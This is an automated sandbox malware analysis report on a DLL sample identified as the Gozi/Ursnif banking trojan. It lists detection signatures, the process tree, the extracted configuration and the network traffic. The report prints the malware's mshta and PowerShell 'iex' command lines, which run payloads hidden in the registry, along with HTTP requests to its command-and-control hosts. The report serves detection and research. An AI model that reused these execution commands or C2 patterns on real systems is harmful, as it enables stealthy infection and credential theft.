Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report NJPcHPuRcG.dll

Overview

General Information

Sample Name:NJPcHPuRcG.dll
Analysis ID:353243
MD5:48ac334e786156ef605b82dd563373f4
SHA1:1710cf3539eaaf618a613e690157adf30550fade
SHA256:71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Tags:dllGoziISFBUrsnif

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6432 cmdline: loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 6448 cmdline: regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 6768 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 5052 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 6456 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6488 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6532 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6968 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
          • cvtres.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
        • iexplore.exe (PID: 1276 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 1752 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 4676 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5724 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6968 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
        • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
        00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 9 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5140, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', ProcessId: 5724
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4676, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5140
          Sigma detected: Suspicious Rundll32 ActivityShow sources
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6768, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5052

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: regsvr32.exe.6448.2.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: NJPcHPuRcG.dllVirustotal: Detection: 15%Perma Link

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: NJPcHPuRcG.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: global trafficHTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmpString found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmpString found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmpString found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.msn.com
          Source: unknownHTTP traffic detected: POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:26:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
          Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
